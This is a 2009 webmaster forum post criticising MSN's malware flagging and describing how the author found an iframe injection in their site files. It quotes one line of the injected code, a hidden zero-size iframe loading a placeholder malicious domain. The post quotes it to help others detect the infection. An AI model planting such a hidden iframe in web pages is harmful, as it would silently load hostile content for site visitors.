Welcome to WebmasterWorld Guest from

Forum Moderators: mack

Message Too Old, No Replies

MSN fails toHELP webmasters find malware problems on a site

My help to you & Three ways MSN ought to do better in identifying malware.

9:20 pm on Jun 26, 2009 (gmt 0)

New User

5+ Year Member

joined:Dec 9, 2007
posts: 26
votes: 0

MSN does not give any specific identification of the problem that causes them to flag a site for malware. They don't even notify the webmaster that the site is flagged. How lame is that when the solution is so simple?

1) send an email to "webmaster at domain"; and similar standard email addresses notifying a problem has been found. Most people check their email more often then bing.com/webmaster control panel. I believe Google does email a webmaster at domain if a problem is found.

2) provide a cache copy of the page as the msnbot viewed it. Because of variations ... as with default ad banners ... a webmaster may not be able to see the page the way the msnbot saw it

3) identify the specific code that triggered the bot and the malware flag. For Pete's sake, why keep it a secret and leave a webmaster to search for who knows what? Why go on a wild goose chase for endless maybe's instead of having a specific phrase that can be found with a search?

Lastly, when I downloaded all my site htm files to check, I used the file search companion in WinXP. In my case, I put in the box for "all files and folders" a "word or phrase in the file" text search within files in the directory for "iframe" with "search subfolders" checked. The search showed up nothing except a legitimate text reference in a file to ...wriframe.html, a legitimate filename. It wasn't until out of frustration I tried a different program to search for those six letters in iframe that I found files that were infected with an iframe injection. I haven't figured out why search companion didn't locate anything.

I also tried a search companion search from another computer on my home network on which I had just wiped the C: drive and reinstalled the operating system.

Darn it! Since writing the last paragraph, I tried a Windows Search Companion text search for the text "cgi?2" - which is another part of the injected iframe code - and it did show up the known infected files, and I even found a previously overlooked file.

So, I put the phrase "infected with an iframe injection" in a file. Search Companion text search for "iframe" found that.

Search Companion still misses "iframe" text in this critical code line:
<body><iframe src="http://DUMMY-MALICIOUS-DOMAIN/in.cgi?2" width="0" height="0" frameborder="0"></iframe>

Anyhow, if you are reading this message because you are searching for help identifying malware in your website files, here is my wisdom .... don't rely on Windows Search Companion to find "iframe" in a line of html code. Use some alternate software.